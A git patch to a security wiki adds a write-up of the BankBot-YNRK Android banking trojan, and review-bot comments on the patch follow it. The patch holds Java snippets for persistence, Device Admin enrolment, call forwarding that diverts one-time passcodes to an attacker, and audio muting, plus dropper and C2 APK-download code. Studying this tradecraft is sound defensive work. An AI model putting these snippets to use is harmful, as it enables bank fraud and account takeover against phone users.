From 70eefb8ad89853e11cbeb9a08a9db09bec993a88 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Mon, 3 Nov 2025 12:54:49 +0000 Subject: [PATCH] =?UTF-8?q?Add=20content=20from:=20Investigation=20Report:?= =?UTF-8?q?=20Android/BankBot=E2=80=91YNRK=20Mobile=20Banking=20Tr...?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../mobile-phishing-malicious-apps.md | 75 ++++++++++++++++++- .../css-injection/less-code-injection.md | 7 +- 2 files changed, 77 insertions(+), 5 deletions(-) diff --git a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md index 7ca3e849fb4..3856fd5e0d9 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md @@ -63,6 +63,9 @@ ## Useful Frida Snippet: Auto-Bypass Invitation Code +
+Frida hook to bypass invitation code + ```python # frida -U -f com.badapp.android -l bypass.js --no-pause # Hook HttpURLConnection write to always return success @@ -82,6 +85,8 @@ Java.perform(function() { }); ``` +
+ ## Indicators (Generic) ``` @@ -145,7 +150,7 @@ Minimal loader: ```java WebView wv = findViewById(R.id.web); wv.getSettings().setJavaScriptEnabled(true); -wv.loadUrl(upiPage); // ex: https:///gate.htm +wv.loadUrl(upiPage); // ex: https://``/gate.htm ``` ### Self-propagation and SMS/OTP interception @@ -228,9 +233,12 @@ Attackers increasingly replace static APK links with a Socket.IO/WebSocket chann Typical client flow observed in the wild: +
+Socket.IO client flow assembling APK in the browser + ```javascript // Open Socket.IO channel and request payload -const socket = io("wss:///ws", { transports: ["websocket"] }); +const socket = io("wss://``/ws", { transports: ["websocket"] }); socket.emit("startDownload", { app: "com.example.app" }); // Accumulate binary chunks and drive fake Play progress UI @@ -248,6 +256,8 @@ socket.on("downloadComplete", () => { }); ``` +
+ Why it evades simple controls: - No static APK URL is exposed; payload is reconstructed in memory from WebSocket frames. - URL/MIME/extension filters that block direct .apk responses may miss binary data tunneled via WebSockets/Socket.IO. 
@@ -265,6 +275,59 @@ See also WebSocket tradecraft and tooling: {{#endref}} +## Accessibility-driven banker TTPs: JobScheduler + Device Admin + MMI call forwarding (BankBot‑YNRK) + +The Android/BankBot‑YNRK banker shows a compact stack for durable control and on‑device fraud via Accessibility. Key reusable traits: + +- Bootstrap & scope + - Target Android ≤ 13 where Accessibility can still auto‑drive permission flows; deep‑link Accessibility Settings and auto‑accept prompts. See: + +{{#ref}} +../../mobile-pentesting/android-app-pentesting/accessibility-services-abuse.md +{{#endref}} + +- Persistence via JobScheduler + Device Admin + - Schedule a persisted job (survives reboot) to regularly re‑kick background tasks: + ```java + ComponentName svc = new ComponentName(ctx, JobHandlerService.class); + JobInfo ji = new JobInfo.Builder(1337, svc) + .setRequiredNetworkType(JobInfo.NETWORK_TYPE_ANY) + .setPersisted(true) + .setMinimumLatency(30_000) + .setBackoffCriteria(30_000, JobInfo.BACKOFF_POLICY_LINEAR) + .build(); + ctx.getSystemService(JobScheduler.class).schedule(ji); + ``` + - Enrol as Device Admin to harden removal and regain control after reboot: + ```java + Intent i = new Intent(DevicePolicyManager.ACTION_ADD_DEVICE_ADMIN); + i.putExtra(DevicePolicyManager.EXTRA_DEVICE_ADMIN, new ComponentName(ctx, AdminReceiver.class)); + i.putExtra(DevicePolicyManager.EXTRA_ADD_EXPLANATION, "Enable advanced protections"); + ctx.startActivity(i); + ``` + +- Silent OTP interception via call forwarding (MMI/USSD) + - Programmatically dial MMI to enable unconditional call forwarding, diverting voice OTPs to an attacker‑controlled number: + ```java + // Requires CALL_PHONE; behaviour varies by carrier/OEM + String mmi = "**21*" + number + "#"; + Intent call = new Intent(Intent.ACTION_CALL, Uri.parse("tel:" + Uri.encode(mmi))); + ctx.startActivity(call); + ``` + +- C2 & traffic + - Stage‑based HTTP tasking (e.g., on `:8181`) exchanging device/app context and target package lists; 
optional WebSocket/WebRTC (Janus on `:8989`) for interactive control. + +- Anti‑analysis & stealth + - Fingerprint vendor/ROM/emulator at init (`android.os.Build` fields, model→resolution maps) to gate execution. + - Suppress audible cues by muting multiple AudioManager streams when sensitive actions run: + ```java + AudioManager am = (AudioManager) ctx.getSystemService(Context.AUDIO_SERVICE); + int[] S = {AudioManager.STREAM_MUSIC, AudioManager.STREAM_RING, AudioManager.STREAM_NOTIFICATION}; + for (int s: S) am.setStreamVolume(s, 0, 0); + ``` + + ## Android Accessibility/Overlay & Device Admin Abuse, ATS automation, and NFC relay orchestration – RatOn case study The RatOn banker/RAT campaign (ThreatFabric) is a concrete example of how modern mobile phishing operations blend WebView droppers, Accessibility-driven UI automation, overlays/ransom, Device Admin coercion, Automated Transfer System (ATS), crypto wallet takeover, and even NFC-relay orchestration. This section abstracts the reusable techniques. @@ -274,6 +337,9 @@ Attackers present a WebView pointing to an attacker page and inject a JavaScript Minimal pattern: +
+WebView dropper that installs a second-stage payload from assets + ```java public class DropperActivity extends Activity { @Override protected void onCreate(Bundle b){ @@ -303,6 +369,8 @@ public class DropperActivity extends Activity { } ``` +
+ HTML on the page: ```html @@ -440,5 +508,6 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new - [Banker Trojan Targeting Indonesian and Vietnamese Android Users (DomainTools)](https://dti.domaintools.com/banker-trojan-targeting-indonesian-and-vietnamese-android-users/) - [DomainTools SecuritySnacks – ID/VN Banker Trojans (IOCs)](https://github.com/DomainTools/SecuritySnacks/blob/main/2025/BankerTrojan-ID-VN) - [Socket.IO](https://socket.io) +- [Investigation Report: Android/BankBot‑YNRK Mobile Banking Trojan (CYFIRMA)](https://www.cyfirma.com/research/investigation-report-android-bankbot-ynrk-mobile-banking-trojan/) -{{#include ../../banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/pentesting-web/xs-search/css-injection/less-code-injection.md b/src/pentesting-web/xs-search/css-injection/less-code-injection.md index b9d599deb30..6d338df2b68 100644 --- a/src/pentesting-web/xs-search/css-injection/less-code-injection.md +++ b/src/pentesting-web/xs-search/css-injection/less-code-injection.md @@ -1,4 +1,6 @@ -## LESS Code Injection leading to SSRF & Local File Read +# LESS Code Injection leading to SSRF & Local File Read + +{{#include ../../../banners/hacktricks-training.md}} LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive. During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used. 
@@ -59,4 +61,5 @@ curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \ * [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04) * [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/) -* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258) \ No newline at end of file +* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258) +{{#include ../../../banners/hacktricks-training.md}}
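Review bot: In hunk `@@ -63,6 +63,9 @@` of mobile-phishing-malicious-apps.md, the new `<details><summary>` wrapper is fine, but the block it wraps is fenced as ```python while its contents are Frida JavaScript (`-l bypass.js`, `Java.perform(function() {`). Since this hunk already touches the block, change the fence tag to `javascript` so the snippet highlights correctly and readers do not try to run it as Python.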
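Review bot: In hunk `@@ -145,7 +150,7 @@`, the replacement `wv.loadUrl(upiPage); // ex: https://``/gate.htm` leaves a pair of empty backticks inside a fenced `java` block, where they render literally instead of escaping anything; the original `https:///gate.htm` had already lost its host placeholder, so the fix does not restore it. Use an explicit placeholder such as `https://ATTACKER_HOST/gate.htm` (or `https://<attacker>/gate.htm`, which is safe inside a code fence) so the example reads as intended.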
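Review bot: In hunk `@@ -228,9 +233,12 @@`, the same problem appears in `const socket = io("wss://``/ws", ...)`: empty backticks inside a `javascript` fence produce a literal `` ``` `` in the rendered URL. Replace it with a named placeholder such as `wss://C2_HOST/ws` and keep the placeholder style consistent with the `gate.htm` example in the same file.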
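Review bot: In hunk `@@ -265,6 +275,59 @@`, the JobScheduler snippet calls `.setPersisted(true)` without documenting that the app must declare `android.permission.RECEIVE_BOOT_COMPLETED`; without it `JobScheduler.schedule()` rejects the job with an `IllegalArgumentException`, so the "survives reboot" claim only holds with that manifest entry. Likewise the Device Admin snippet should state that `AdminReceiver` must be declared in the manifest with `android.permission.BIND_DEVICE_ADMIN` and a `device_admin` meta-data policy resource before `ACTION_ADD_DEVICE_ADMIN` does anything. Add both prerequisites as a short comment above each block (e.g. `// Manifest: <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>`). Also, the "C2 & traffic" bullet is split mid-sentence ("target package lists;" / "optional WebSocket/WebRTC (Janus on `:8989`)"); rejoin it into one line. Since this section is the defender-facing companion to the Accessibility reference it links, a one-line detection cue per bullet (persisted jobs from a non-system package, a freshly enrolled device admin, an outgoing `**21*` MMI string) would make it consistent with the "Indicators (Generic)" section earlier in the file.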
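Review bot: In hunk `@@ -440,5 +508,6 @@`, the change removes the trailing newline from mobile-phishing-malicious-apps.md (`\ No newline at end of file` on the new `{{#include ../../banners/hacktricks-training.md}}` line) while the other file in this patch gains one. Restore the final newline so the two pages stay consistent and future diffs do not churn on the last line.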